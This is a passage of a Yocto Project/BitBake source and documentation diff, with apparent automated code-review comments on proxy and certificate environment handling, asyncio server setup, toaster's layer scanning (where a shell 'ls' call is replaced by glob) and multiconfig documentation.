465 logger.error("Unable to acquire lock '%s', directory is not writable", 475 logger.error("Unable to acquire lock '%s', directory is not writable",
466 name) 476 name)
@@ -494,7 +504,7 @@ def lockfile(name, shared=False, retry=True, block=False):
494 return lf 504 return lf
495 lf.close() 505 lf.close()
496 except OSError as e: 506 except OSError as e:
497 if e.errno == errno.EACCES: 507 if e.errno == errno.EACCES or e.errno == errno.ENAMETOOLONG:
498 logger.error("Unable to acquire lock '%s', %s", 508 logger.error("Unable to acquire lock '%s', %s",
499 e.strerror, name) 509 e.strerror, name)
500 sys.exit(1) 510 sys.exit(1)
@@ -959,6 +969,17 @@ def which(path, item, direction = 0, history = False, executable=False):
959 return "", hist 969 return "", hist
960 return "" 970 return ""
961 971
972@contextmanager
973def umask(new_mask):
974 """
975 Context manager to set the umask to a specific mask, and restore it afterwards.
976 """
977 current_mask = os.umask(new_mask)
978 try:
979 yield
980 finally:
981 os.umask(current_mask)
982
962def to_boolean(string, default=None): 983def to_boolean(string, default=None):
963 if not string: 984 if not string:
964 return default 985 return default
@@ -1560,21 +1581,22 @@ def set_process_name(name):
1560 1581
1561# export common proxies variables from datastore to environment 1582# export common proxies variables from datastore to environment
1562def export_proxies(d): 1583def export_proxies(d):
1563 import os 1584 """ export common proxies variables from datastore to environment """
1564 1585
1565 variables = ['http_proxy', 'HTTP_PROXY', 'https_proxy', 'HTTPS_PROXY', 1586 variables = ['http_proxy', 'HTTP_PROXY', 'https_proxy', 'HTTPS_PROXY',
1566 'ftp_proxy', 'FTP_PROXY', 'no_proxy', 'NO_PROXY', 1587 'ftp_proxy', 'FTP_PROXY', 'no_proxy', 'NO_PROXY',
1567 'GIT_PROXY_COMMAND'] 1588 'GIT_PROXY_COMMAND', 'SSL_CERT_FILE', 'SSL_CERT_DIR']
1568 exported = False 1589 exported = False
1569 1590
1570 for v in variables: 1591 origenv = d.getVar("BB_ORIGENV")
1571 if v in os.environ.keys(): 1592
1593 for name in variables:
1594 value = d.getVar(name)
1595 if not value and origenv:
1596 value = origenv.getVar(name)
1597 if value:
1598 os.environ[name] = value
1572 exported = True 1599 exported = True
1573 else:
1574 v_proxy = d.getVar(v)
1575 if v_proxy is not None:
1576 os.environ[v] = v_proxy
1577 exported = True
1578 1600
1579 return exported 1601 return exported
1580 1602
@@ -1584,7 +1606,9 @@ def load_plugins(logger, plugins, pluginpath):
1584 logger.debug(1, 'Loading plugin %s' % name) 1606 logger.debug(1, 'Loading plugin %s' % name)
1585 spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) 1607 spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] )
1586 if spec: 1608 if spec:
1587 return spec.loader.load_module() 1609 mod = importlib.util.module_from_spec(spec)
1610 spec.loader.exec_module(mod)
1611 return mod
1588 1612
1589 logger.debug(1, 'Loading plugins from %s...' % pluginpath) 1613 logger.debug(1, 'Loading plugins from %s...' % pluginpath)
1590 1614
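Review bot: `export_proxies` now gives the datastore precedence over the process environment, and the one-line docstring does not say so. `os.environ[name] = value` runs whenever `d.getVar(name)` or `BB_ORIGENV` yields a value, whereas the old code left a variable already present in `os.environ` untouched. With `SSL_CERT_FILE` and `SSL_CERT_DIR` added to the list, metadata reachable through `d` can change which CA bundle TLS clients started from this process pick up. I would expand the docstring to state the order (datastore value, then `BB_ORIGENV`, existing environment overwritten) and name the two certificate variables. The `# export common proxies variables ...` comment above the `def` now duplicates the docstring and can go.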
diff --git a/bitbake/lib/bblayers/action.py b/bitbake/lib/bblayers/action.py
index d6459d6617..d2f9c1bbde 100644
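--- a/bitbake/lib/bblayers/action.py
+++ b/bitbake/lib/bblayers/action.py
@@ -50,10 +50,10 @@ class ActionPlugin(LayerPlugin):
  if not (args.force or notadded):
  try:
  self.tinfoil.run_command('parseConfiguration')
- except bb.tinfoil.TinfoilUIException:
+ except (bb.tinfoil.TinfoilUIException, bb.BBHandledException):
  # Restore the back up copy of bblayers.conf
  shutil.copy2(backup, bblayers_conf)
- bb.fatal("Parse failure with the specified layer added")
+ bb.fatal("Parse failure with the specified layer added, aborting.")
  else:
  for item in notadded:
  sys.stderr.write("Specified layer %s is already in BBLAYERS\n" % item)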
diff --git a/bitbake/lib/bblayers/layerindex.py b/bitbake/lib/bblayers/layerindex.py
index 95b67a6621..f64d18e819 100644
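--- a/bitbake/lib/bblayers/layerindex.py
+++ b/bitbake/lib/bblayers/layerindex.py
@@ -206,6 +206,7 @@ class LayerIndexPlugin(ActionPlugin):
 """
  args.show_only = True
  args.ignore = []
+ args.shallow = True
  self.do_layerindex_fetch(args)
 
  def register_commands(self, sp):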
diff --git a/bitbake/lib/bblayers/query.py b/bitbake/lib/bblayers/query.py
index e2cc310532..652a3acce0 100644
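--- a/bitbake/lib/bblayers/query.py
+++ b/bitbake/lib/bblayers/query.py
@@ -150,7 +150,7 @@ skipped recipes will also be listed, with a " (skipped)" suffix.
  def print_item(f, pn, ver, layer, ispref):
  if not selected_layer or layer == selected_layer:
  if not bare and f in skiplist:
- skipped = ' (skipped)'
+ skipped = ' (skipped: %s)' % self.tinfoil.cooker.skiplist[f].skipreason
  else:
  skipped = ''
  if show_filenames:
@@ -433,10 +433,10 @@ NOTE: .bbappend files can impact the dependencies.
  line = fnfile.readline()
 
  # The "require/include xxx" in conf/machine/*.conf, .inc and .bbclass
- conf_re = re.compile(".*/conf/machine/[^\/]*\.conf$")
- inc_re = re.compile(".*\.inc$")
+ conf_re = re.compile(r".*/conf/machine/[^\/]*\.conf$")
+ inc_re = re.compile(r".*\.inc$")
  # The "inherit xxx" in .bbclass
- bbclass_re = re.compile(".*\.bbclass$")
+ bbclass_re = re.compile(r".*\.bbclass$")
  for layerdir in self.bblayers:
  layername = self.get_layer_name(layerdir)
  for dirpath, dirnames, filenames in os.walk(layerdir):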
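Review bot: `print_item` tests membership with `f in skiplist` but then reads the reason from a different expression, `self.tinfoil.cooker.skiplist[f].skipreason`. The local `skiplist` is defined outside the hunk, so it cannot be confirmed here that both refer to the same mapping. If they can differ, a file present in one and absent from the other raises KeyError while the line is being formatted. Reading the reason from the object that was just tested, or falling back to the plain `' (skipped)'` text when the lookup misses, removes that dependency.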
diff --git a/bitbake/lib/hashserv/server.py b/bitbake/lib/hashserv/server.py
index 81050715ea..f38a22ad92 100644
--- a/bitbake/lib/hashserv/server.py
+++ b/bitbake/lib/hashserv/server.py
@@ -12,6 +12,7 @@ import math
12import os 12import os
13import signal 13import signal
14import socket 14import socket
15import sys
15import time 16import time
16from . import chunkify, DEFAULT_MAX_CHUNK 17from . import chunkify, DEFAULT_MAX_CHUNK
17 18
@@ -419,9 +420,14 @@ class Server(object):
419 self._cleanup_socket = None 420 self._cleanup_socket = None
420 421
421 def start_tcp_server(self, host, port): 422 def start_tcp_server(self, host, port):
422 self.server = self.loop.run_until_complete( 423 if sys.version_info[0] == 3 and sys.version_info[1] < 6:
423 asyncio.start_server(self.handle_client, host, port, loop=self.loop) 424 self.server = self.loop.run_until_complete(
424 ) 425 asyncio.start_server(self.handle_client, host, port, loop=self.loop)
426 )
427 else:
428 self.server = self.loop.run_until_complete(
429 asyncio.start_server(self.handle_client, host, port)
430 )
425 431
426 for s in self.server.sockets: 432 for s in self.server.sockets:
427 logger.info('Listening on %r' % (s.getsockname(),)) 433 logger.info('Listening on %r' % (s.getsockname(),))
@@ -444,9 +450,14 @@ class Server(object):
444 try: 450 try:
445 # Work around path length limits in AF_UNIX 451 # Work around path length limits in AF_UNIX
446 os.chdir(os.path.dirname(path)) 452 os.chdir(os.path.dirname(path))
447 self.server = self.loop.run_until_complete( 453 if sys.version_info[0] == 3 and sys.version_info[1] < 6:
448 asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop) 454 self.server = self.loop.run_until_complete(
449 ) 455 asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop)
456 )
457 else:
458 self.server = self.loop.run_until_complete(
459 asyncio.start_unix_server(self.handle_client, os.path.basename(path))
460 )
450 finally: 461 finally:
451 os.chdir(cwd) 462 os.chdir(cwd)
452 463
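Review bot: The version test and the `run_until_complete` call are written out twice in each of the two hunks, with the branches differing only in `loop=self.loop`. Building the keyword once keeps the TCP and unix-socket paths in step: `kwargs = {'loop': self.loop} if sys.version_info < (3, 6) else {}`, then `asyncio.start_server(self.handle_client, host, port, **kwargs)`. The tuple comparison also replaces the spelled-out `sys.version_info[0] == 3 and sys.version_info[1] < 6`. A short comment saying why `loop` is only passed on older interpreters would help the next reader.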
diff --git a/bitbake/lib/layerindexlib/__init__.py b/bitbake/lib/layerindexlib/__init__.py
index 77196b408f..f30ee9e259 100644
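--- a/bitbake/lib/layerindexlib/__init__.py
+++ b/bitbake/lib/layerindexlib/__init__.py
@@ -6,7 +6,6 @@
 import datetime
 
 import logging
-import imp
 
 from collections import OrderedDict
 from layerindexlib.plugin import LayerIndexPluginUrlError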
diff --git a/bitbake/lib/toaster/toastergui/api.py b/bitbake/lib/toaster/toastergui/api.py
index b4cdc335ef..e367bd910e 100644
--- a/bitbake/lib/toaster/toastergui/api.py
+++ b/bitbake/lib/toaster/toastergui/api.py
@@ -11,7 +11,7 @@ import os
11import re 11import re
12import logging 12import logging
13import json 13import json
14import subprocess 14import glob
15from collections import Counter 15from collections import Counter
16 16
17from orm.models import Project, ProjectTarget, Build, Layer_Version 17from orm.models import Project, ProjectTarget, Build, Layer_Version
@@ -227,20 +227,18 @@ class XhrSetDefaultImageUrl(View):
227# same logical name 227# same logical name
228# * Each project that uses a layer will have its own 228# * Each project that uses a layer will have its own
229# LayerVersion and Project Layer for it 229# LayerVersion and Project Layer for it
230# * During the Paroject delete process, when the last 230# * During the Project delete process, when the last
231# LayerVersion for a 'local_source_dir' layer is deleted 231# LayerVersion for a 'local_source_dir' layer is deleted
232# then the Layer record is deleted to remove orphans 232# then the Layer record is deleted to remove orphans
233# 233#
234 234
235def scan_layer_content(layer,layer_version): 235def scan_layer_content(layer,layer_version):
236 # if this is a local layer directory, we can immediately scan its content 236 # if this is a local layer directory, we can immediately scan its content
237 if layer.local_source_dir: 237 if os.path.isdir(layer.local_source_dir):
238 try: 238 try:
239 # recipes-*/*/*.bb 239 # recipes-*/*/*.bb
240 cmd = '%s %s' % ('ls', os.path.join(layer.local_source_dir,'recipes-*/*/*.bb')) 240 recipes_list = glob.glob(os.path.join(layer.local_source_dir, 'recipes-*/*/*.bb'))
241 recipes_list = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.read() 241 for recipe in recipes_list:
242 recipes_list = recipes_list.decode("utf-8").strip()
243 if recipes_list and 'No such' not in recipes_list:
244 for recipe in recipes_list.split('\n'): 242 for recipe in recipes_list.split('\n'):
245 recipe_path = recipe[recipe.rfind('recipes-'):] 243 recipe_path = recipe[recipe.rfind('recipes-'):]
246 recipe_name = recipe[recipe.rfind('/')+1:].replace('.bb','') 244 recipe_name = recipe[recipe.rfind('/')+1:].replace('.bb','')
@@ -260,6 +258,9 @@ def scan_layer_content(layer,layer_version):
260 258
261 except Exception as e: 259 except Exception as e:
262 logger.warning("ERROR:scan_layer_content: %s" % e) 260 logger.warning("ERROR:scan_layer_content: %s" % e)
261 else:
262 logger.warning("ERROR: wrong path given")
263 raise KeyError("local_source_dir")
263 264
264class XhrLayer(View): 265class XhrLayer(View):
265 """ Delete, Get, Add and Update Layer information 266 """ Delete, Get, Add and Update Layer information
@@ -456,15 +457,18 @@ class XhrLayer(View):
456 'layerdetailurl': 457 'layerdetailurl':
457 layer_dep.get_detailspage_url(project.pk)}) 458 layer_dep.get_detailspage_url(project.pk)})
458 459
459 # Scan the layer's content and update components 460 # Only scan_layer_content if layer is local
460 scan_layer_content(layer,layer_version) 461 if layer_data.get('local_source_dir', None):
462 # Scan the layer's content and update components
463 scan_layer_content(layer,layer_version)
461 464
462 except Layer_Version.DoesNotExist: 465 except Layer_Version.DoesNotExist:
463 return error_response("layer-dep-not-found") 466 return error_response("layer-dep-not-found")
464 except Project.DoesNotExist: 467 except Project.DoesNotExist:
465 return error_response("project-not-found") 468 return error_response("project-not-found")
466 except KeyError: 469 except KeyError as e:
467 return error_response("incorrect-parameters") 470 _log("KeyError: %s" % e)
471 return error_response(f"incorrect-parameters")
468 472
469 return JsonResponse({'error': "ok", 473 return JsonResponse({'error': "ok",
470 'imported_layer': { 474 'imported_layer': {
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst
index c9622d3647..6a44511af2 100644
--- a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst
+++ b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst
@@ -222,19 +222,10 @@ an entire Linux distribution, including the toolchain, from source.
222 .. tip:: 222 .. tip::
223 223
224 You can significantly speed up your build and guard against fetcher 224 You can significantly speed up your build and guard against fetcher
225 failures by using mirrors. To use mirrors, add these lines to your 225 failures by using mirrors. To use mirrors, add this line to your
226 local.conf file in the Build directory: :: 226 ``local.conf`` file in the :term:`Build Directory`: ::
227 227
228 SSTATE_MIRRORS = "\ 228 SSTATE_MIRRORS ?= "file://.* https://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
229 file://.* http://sstate.yoctoproject.org/dev/PATH;downloadfilename=PATH \n \
230 file://.* http://sstate.yoctoproject.org/&YOCTO_DOC_VERSION_MINUS_ONE;/PATH;downloadfilename=PATH \n \
231 file://.* http://sstate.yoctoproject.org/&YOCTO_DOC_VERSION;/PATH;downloadfilename=PATH \n \
232 "
233
234
235 The previous examples showed how to add sstate paths for Yocto Project
236 &YOCTO_DOC_VERSION_MINUS_ONE;, &YOCTO_DOC_VERSION;, and a development
237 area. For a complete index of sstate locations, see http://sstate.yoctoproject.org/.
238 229
239#. **Start the Build:** Continue with the following command to build an OS 230#. **Start the Build:** Continue with the following command to build an OS
240 image for the target, which is ``core-image-sato`` in this example: 231 image for the target, which is ``core-image-sato`` in this example:
diff --git a/documentation/bsp-guide/bsp.rst b/documentation/bsp-guide/bsp.rst
index d0275eea9a..efb5328911 100644
--- a/documentation/bsp-guide/bsp.rst
+++ b/documentation/bsp-guide/bsp.rst
@@ -166,8 +166,9 @@ section.
166#. *Determine the BSP Layer You Want:* The Yocto Project supports many 166#. *Determine the BSP Layer You Want:* The Yocto Project supports many
167 BSPs, which are maintained in their own layers or in layers designed 167 BSPs, which are maintained in their own layers or in layers designed
168 to contain several BSPs. To get an idea of machine support through 168 to contain several BSPs. To get an idea of machine support through
169 BSP layers, you can look at the `index of 169 BSP layers, you can look at the
170 machines <&YOCTO_RELEASE_DL_URL;/machines>`__ for the release. 170 :yocto_dl:`index of machines </releases/yocto/&DISTRO_REL_TAG;/machines>`
171 for the release.
171 172
172#. *Optionally Clone the meta-intel BSP Layer:* If your hardware is 173#. *Optionally Clone the meta-intel BSP Layer:* If your hardware is
173 based on current Intel CPUs and devices, you can leverage this BSP 174 based on current Intel CPUs and devices, you can leverage this BSP
diff --git a/documentation/conf.py b/documentation/conf.py
index c2e9801fd9..e9078e054e 100644
--- a/documentation/conf.py
+++ b/documentation/conf.py
@@ -15,8 +15,27 @@
15import os 15import os
16import sys 16import sys
17import datetime 17import datetime
18try:
19 import yaml
20except ImportError:
21 sys.stderr.write("The Yocto Project Sphinx documentation requires PyYAML.\
22 \nPlease make sure to install pyyaml python package.\n")
23 sys.exit(1)
18 24
19current_version = "3.1.6" 25# current_version = "dev"
26# bitbake_version = "" # Leave empty for development branch
27# Obtain versions from poky.yaml instead
28with open("poky.yaml") as data:
29 buff = data.read()
30 subst_vars = yaml.safe_load(buff)
31 if "DOCCONF_VERSION" not in subst_vars:
32 sys.stderr.write("Please set DOCCONF_VERSION in poky.yaml")
33 sys.exit(1)
34 current_version = subst_vars["DOCCONF_VERSION"]
35 if "BITBAKE_SERIES" not in subst_vars:
36 sys.stderr.write("Please set BITBAKE_SERIES in poky.yaml")
37 sys.exit(1)
38 bitbake_version = subst_vars["BITBAKE_SERIES"]
20 39
21# String used in sidebar 40# String used in sidebar
22version = 'Version: ' + current_version 41version = 'Version: ' + current_version
@@ -78,11 +97,12 @@ extlinks = {
78 'yocto_git': ('https://git.yoctoproject.org%s', None), 97 'yocto_git': ('https://git.yoctoproject.org%s', None),
79 'oe_home': ('https://www.openembedded.org%s', None), 98 'oe_home': ('https://www.openembedded.org%s', None),
80 'oe_lists': ('https://lists.openembedded.org%s', None), 99 'oe_lists': ('https://lists.openembedded.org%s', None),
100 'oe_git': ('https://git.openembedded.org%s', None),
81} 101}
82 102
83# Intersphinx config to use cross reference with Bitbake user manual 103# Intersphinx config to use cross reference with Bitbake user manual
84intersphinx_mapping = { 104intersphinx_mapping = {
85 'bitbake': ('https://docs.yoctoproject.org/bitbake/1.46', None) 105 'bitbake': ('https://docs.yoctoproject.org/bitbake/' + bitbake_version, None)
86} 106}
87 107
88# -- Options for HTML output ------------------------------------------------- 108# -- Options for HTML output -------------------------------------------------
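Review bot: The poky.yaml loader added at new lines 28-38 assumes `yaml.safe_load` returns a mapping. An empty file yields `None` and a scalar-only file yields a string, so the `"DOCCONF_VERSION" not in subst_vars` test either raises a TypeError traceback or silently does a substring test instead of printing the intended message. A guard before the key checks, such as `if not isinstance(subst_vars, dict): sys.exit("poky.yaml must contain a mapping")`, keeps the failure readable. The two "Please set ... in poky.yaml" messages also lack the trailing `\n` that the PyYAML import message has. Using `safe_load` rather than `yaml.load` is the right call, and a short comment would stop it being relaxed later, for example `# safe_load only: poky.yaml is plain data, never construct Python objects from it`.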
diff --git a/documentation/dev-manual/dev-manual-common-tasks.rst b/documentation/dev-manual/dev-manual-common-tasks.rst
index d401d3b4ee..d1dde6d0f3 100644
--- a/documentation/dev-manual/dev-manual-common-tasks.rst
+++ b/documentation/dev-manual/dev-manual-common-tasks.rst
@@ -2168,7 +2168,7 @@ recipe, but which one? You can configure your build to call out the
2168kernel recipe you want by using the 2168kernel recipe you want by using the
2169:term:`PREFERRED_PROVIDER` 2169:term:`PREFERRED_PROVIDER`
2170variable. As an example, consider the 2170variable. As an example, consider the
2171`x86-base.inc <https://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/conf/machine/include/x86-base.inc>`_ 2171:yocto_git:`x86-base.inc </cgit/cgit.cgi/poky/tree/meta/conf/machine/include/x86-base.inc>`
2172include file, which is a machine (i.e. 2172include file, which is a machine (i.e.
2173:term:`MACHINE`) configuration file. 2173:term:`MACHINE`) configuration file.
2174This include file is the reason all x86-based machines use the 2174This include file is the reason all x86-based machines use the
@@ -2628,7 +2628,7 @@ Recipe Syntax
2628Understanding recipe file syntax is important for writing recipes. The 2628Understanding recipe file syntax is important for writing recipes. The
2629following list overviews the basic items that make up a BitBake recipe 2629following list overviews the basic items that make up a BitBake recipe
2630file. For more complete BitBake syntax descriptions, see the 2630file. For more complete BitBake syntax descriptions, see the
2631":doc:`bitbake-user-manual/bitbake-user-manual-metadata`" 2631":doc:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata`"
2632chapter of the BitBake User Manual. 2632chapter of the BitBake User Manual.
2633 2633
2634- *Variable Assignments and Manipulations:* Variable assignments allow 2634- *Variable Assignments and Manipulations:* Variable assignments allow
@@ -3854,7 +3854,7 @@ Setting Up and Running a Multiple Configuration Build
3854 3854
3855To accomplish a multiple configuration build, you must define each 3855To accomplish a multiple configuration build, you must define each
3856target's configuration separately using a parallel configuration file in 3856target's configuration separately using a parallel configuration file in
3857the :term:`Build Directory`, and you 3857the :term:`Build Directory` or configuration directory within a layer, and you
3858must follow a required file hierarchy. Additionally, you must enable the 3858must follow a required file hierarchy. Additionally, you must enable the
3859multiple configuration builds in your ``local.conf`` file. 3859multiple configuration builds in your ``local.conf`` file.
3860 3860
@@ -3862,47 +3862,47 @@ Follow these steps to set up and execute multiple configuration builds:
3862 3862
3863- *Create Separate Configuration Files*: You need to create a single 3863- *Create Separate Configuration Files*: You need to create a single
3864 configuration file for each build target (each multiconfig). 3864 configuration file for each build target (each multiconfig).
3865 Minimally, each configuration file must define the machine and the 3865 The configuration definitions are implementation dependent but often
3866 temporary directory BitBake uses for the build. Suggested practice 3866 each configuration file will define the machine and the
3867 dictates that you do not overlap the temporary directories used 3867 temporary directory BitBake uses for the build. Whether the same
3868 during the builds. However, it is possible that you can share the 3868 temporary directory (:term:`TMPDIR`) can be shared will depend on what is
3869 temporary directory 3869 similar and what is different between the configurations. Multiple MACHINE
3870 (:term:`TMPDIR`). For example, 3870 targets can share the same (:term:`TMPDIR`) as long as the rest of the
3871 consider a scenario with two different multiconfigs for the same 3871 configuration is the same, multiple DISTRO settings would need separate
3872 (:term:`TMPDIR`) directories.
3873
3874 For example, consider a scenario with two different multiconfigs for the same
3872 :term:`MACHINE`: "qemux86" built 3875 :term:`MACHINE`: "qemux86" built
3873 for two distributions such as "poky" and "poky-lsb". In this case, 3876 for two distributions such as "poky" and "poky-lsb". In this case,
3874 you might want to use the same ``TMPDIR``. 3877 you would need to use the different :term:`TMPDIR`.
3875 3878
3876 Here is an example showing the minimal statements needed in a 3879 Here is an example showing the minimal statements needed in a
3877 configuration file for a "qemux86" target whose temporary build 3880 configuration file for a "qemux86" target whose temporary build
3878 directory is ``tmpmultix86``: 3881 directory is ``tmpmultix86``::
3879 ::
3880 3882
3881 MACHINE = "qemux86" 3883 MACHINE = "qemux86"
3882 TMPDIR = "${TOPDIR}/tmpmultix86" 3884 TMPDIR = "${TOPDIR}/tmpmultix86"
3883 3885
3884 The location for these multiconfig configuration files is specific. 3886 The location for these multiconfig configuration files is specific.
3885 They must reside in the current build directory in a sub-directory of 3887 They must reside in the current :term:`Build Directory` in a sub-directory of
3886 ``conf`` named ``multiconfig``. Following is an example that defines 3888 ``conf`` named ``multiconfig`` or within a layer's ``conf`` directory
3889 under a directory named ``multiconfig``. Following is an example that defines
3887 two configuration files for the "x86" and "arm" multiconfigs: 3890 two configuration files for the "x86" and "arm" multiconfigs:
3888 3891
3889 .. image:: figures/multiconfig_files.png 3892 .. image:: figures/multiconfig_files.png
3890 :align: center 3893 :align: center
3894 :width: 50%
3891 3895
3892 The reason for this required file hierarchy is because the ``BBPATH`` 3896 The usual :term:`BBPATH` search path is used to locate multiconfig files in
3893 variable is not constructed until the layers are parsed. 3897 a similar way to other conf files.
3894 Consequently, using the configuration file as a pre-configuration
3895 file is not possible unless it is located in the current working
3896 directory.
3897 3898
3898- *Add the BitBake Multi-configuration Variable to the Local 3899- *Add the BitBake Multi-configuration Variable to the Local
3899 Configuration File*: Use the 3900 Configuration File*: Use the
3900 :term:`BBMULTICONFIG` 3901 :term:`BBMULTICONFIG`
3901 variable in your ``conf/local.conf`` configuration file to specify 3902 variable in your ``conf/local.conf`` configuration file to specify
3902 each multiconfig. Continuing with the example from the previous 3903 each multiconfig. Continuing with the example from the previous
3903 figure, the ``BBMULTICONFIG`` variable needs to enable two 3904 figure, the :term:`BBMULTICONFIG` variable needs to enable two
3904 multiconfigs: "x86" and "arm" by specifying each configuration file: 3905 multiconfigs: "x86" and "arm" by specifying each configuration file::
3905 ::
3906 3906
3907 BBMULTICONFIG = "x86 arm" 3907 BBMULTICONFIG = "x86 arm"
3908 3908
@@ -3916,13 +3916,11 @@ Follow these steps to set up and execute multiple configuration builds:
3916 with "". 3916 with "".
3917 3917
3918- *Launch BitBake*: Use the following BitBake command form to launch 3918- *Launch BitBake*: Use the following BitBake command form to launch
3919 the multiple configuration build: 3919 the multiple configuration build::
3920 ::
3921 3920
3922 $ bitbake [mc:multiconfigname:]target [[[mc:multiconfigname:]target] ... ] 3921 $ bitbake [mc:multiconfigname:]target [[[mc:multiconfigname:]target] ... ]
3923 3922
3924 For the example in this section, the following command applies: 3923 For the example in this section, the following command applies::
3925 ::
3926 3924
3927 $ bitbake mc:x86:core-image-minimal mc:arm:core-image-sato mc::core-image-base 3925 $ bitbake mc:x86:core-image-minimal mc:arm:core-image-sato mc::core-image-base
3928 3926
@@ -3937,7 +3935,7 @@ Follow these steps to set up and execute multiple configuration builds:
3937 Support for multiple configuration builds in the Yocto Project &DISTRO; 3935 Support for multiple configuration builds in the Yocto Project &DISTRO;
3938 (&DISTRO_NAME;) Release does not include Shared State (sstate) 3936 (&DISTRO_NAME;) Release does not include Shared State (sstate)
3939 optimizations. Consequently, if a build uses the same object twice 3937 optimizations. Consequently, if a build uses the same object twice
3940 in, for example, two different ``TMPDIR`` 3938 in, for example, two different :term:`TMPDIR`
3941 directories, the build either loads from an existing sstate cache for 3939 directories, the build either loads from an existing sstate cache for
3942 that build at the start or builds the object fresh. 3940 that build at the start or builds the object fresh.
3943 3941
@@ -3958,38 +3956,34 @@ essentially that the
3958 3956
3959To enable dependencies in a multiple configuration build, you must 3957To enable dependencies in a multiple configuration build, you must
3960declare the dependencies in the recipe using the following statement 3958declare the dependencies in the recipe using the following statement
3961form: 3959form::
3962::
3963 3960
3964 task_or_package[mcdepends] = "mc:from_multiconfig:to_multiconfig:recipe_name:task_on_which_to_depend" 3961 task_or_package[mcdepends] = "mc:from_multiconfig:to_multiconfig:recipe_name:task_on_which_to_depend"
3965 3962
3966To better show how to use this statement, consider the example scenario 3963To better show how to use this statement, consider the example scenario
3967from the first paragraph of this section. The following statement needs 3964from the first paragraph of this section. The following statement needs
3968to be added to the recipe that builds the ``core-image-sato`` image: 3965to be added to the recipe that builds the ``core-image-sato`` image::
3969::
3970 3966
3971 do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_rootfs" 3967 do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_rootfs"
3972 3968
3973In this example, the `from_multiconfig` is "x86". The `to_multiconfig` is "arm". The 3969In this example, the `from_multiconfig` is "x86". The `to_multiconfig` is "arm". The
3974task on which the ``do_image`` task in the recipe depends is the 3970task on which the :ref:`ref-tasks-image` task in the recipe depends is the
3975``do_rootfs`` task from the ``core-image-minimal`` recipe associated 3971:ref:`ref-tasks-rootfs` task from the ``core-image-minimal`` recipe associated
3976with the "arm" multiconfig. 3972with the "arm" multiconfig.
3977 3973
3978Once you set up this dependency, you can build the "x86" multiconfig 3974Once you set up this dependency, you can build the "x86" multiconfig
3979using a BitBake command as follows: 3975using a BitBake command as follows::
3980::
3981 3976
3982 $ bitbake mc:x86:core-image-sato 3977 $ bitbake mc:x86:core-image-sato
3983 3978
3984This command executes all the tasks needed to create the 3979This command executes all the tasks needed to create the
3985``core-image-sato`` image for the "x86" multiconfig. Because of the 3980``core-image-sato`` image for the "x86" multiconfig. Because of the
3986dependency, BitBake also executes through the ``do_rootfs`` task for the 3981dependency, BitBake also executes through the :ref:`ref-tasks-rootfs` task for the
3987"arm" multiconfig build. 3982"arm" multiconfig build.
3988 3983
3989Having a recipe depend on the root filesystem of another build might not 3984Having a recipe depend on the root filesystem of another build might not
3990seem that useful. Consider this change to the statement in the 3985seem that useful. Consider this change to the statement in the
3991``core-image-sato`` recipe: 3986``core-image-sato`` recipe::
3992::
3993 3987
3994 do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_image" 3988 do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_image"
3995 3989
@@ -4967,7 +4961,7 @@ configuration would be as follows:
4967 require conf/multilib.conf 4961 require conf/multilib.conf
4968 MULTILIBS = "multilib:lib32" 4962 MULTILIBS = "multilib:lib32"
4969 DEFAULTTUNE_virtclass-multilib-lib32 = "x86" 4963 DEFAULTTUNE_virtclass-multilib-lib32 = "x86"
4970 IMAGE_INSTALL_append = "lib32-glib-2.0" 4964 IMAGE_INSTALL_append = " lib32-glib-2.0"
4971 4965
4972This example enables an additional library named 4966This example enables an additional library named
4973``lib32`` alongside the normal target packages. When combining these 4967``lib32`` alongside the normal target packages. When combining these
@@ -8658,6 +8652,8 @@ In order to run tests, you need to do the following:
8658 - Be sure to use an absolute path when calling this script 8652 - Be sure to use an absolute path when calling this script
8659 with sudo. 8653 with sudo.
8660 8654
8655 - Ensure that your host has the package ``iptables`` installed.
8656
8661 - The package recipe ``qemu-helper-native`` is required to run 8657 - The package recipe ``qemu-helper-native`` is required to run
8662 this script. Build the package using the following command: 8658 this script. Build the package using the following command:
8663 :: 8659 ::
diff --git a/documentation/dev-manual/dev-manual-start.rst b/documentation/dev-manual/dev-manual-start.rst
index a85b86fbfb..6a330d4a32 100644
--- a/documentation/dev-manual/dev-manual-start.rst
+++ b/documentation/dev-manual/dev-manual-start.rst
@@ -659,7 +659,7 @@ Follow these steps to locate and download a particular tarball:
659Using the Downloads Page 659Using the Downloads Page
660------------------------ 660------------------------
661 661
662The :yocto_home:`Yocto Project Website <>` uses a "DOWNLOADS" page 662The :yocto_home:`Yocto Project Website <>` uses a "RELEASES" page
663from which you can locate and download tarballs of any Yocto Project 663from which you can locate and download tarballs of any Yocto Project
664release. Rather than Git repositories, these files represent snapshot 664release. Rather than Git repositories, these files represent snapshot
665tarballs similar to the tarballs located in the Index of Releases 665tarballs similar to the tarballs located in the Index of Releases
@@ -676,12 +676,13 @@ Releases <#accessing-index-of-releases>`__" section.
6761. *Go to the Yocto Project Website:* Open The 6761. *Go to the Yocto Project Website:* Open The
677 :yocto_home:`Yocto Project Website <>` in your browser. 677 :yocto_home:`Yocto Project Website <>` in your browser.
678 678
6792. *Get to the Downloads Area:* Select the "DOWNLOADS" item from the 679#. *Get to the Downloads Area:* Select the "RELEASES" item from the
680 pull-down "SOFTWARE" tab menu near the top of the page. 680 pull-down "DEVELOPMENT" tab menu near the top of the page.
681 681
6823. *Select a Yocto Project Release:* Use the menu next to "RELEASE" to 682#. *Select a Yocto Project Release:* On the top of the "RELEASE" page currently
683 display and choose a recent or past supported Yocto Project release 683 supported releases are displayed, further down past supported Yocto Project
